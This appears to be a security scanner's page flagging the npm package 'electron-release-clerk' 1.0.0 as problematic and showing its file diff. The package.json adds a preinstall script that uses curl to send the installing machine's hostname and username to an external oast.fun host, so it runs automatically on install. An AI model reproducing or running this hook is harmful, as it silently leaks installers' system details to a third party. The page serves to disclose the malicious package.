electron-release-clerk 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of electron-release-clerk might be problematic. Click here for more details.
- package/index.js +3 -0
- package/package.json +12 -0
- package/readme.md +1 -0
package/index.js
ADDED
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "electron-release-clerk",
|
3
|
+
"version": "1.0.0",
|
4
|
+
"main": "index.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "curl --data-urlencode \"info=$(hostname && whoami)\" xqlgjvosmxhbkygeleztfh14q7t71p4bc.oast.fun"
|
8
|
+
},
|
9
|
+
"author": "bluehck",
|
10
|
+
"license": "MIT",
|
11
|
+
"description": ""
|
12
|
+
}
|
package/readme.md
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
Test
|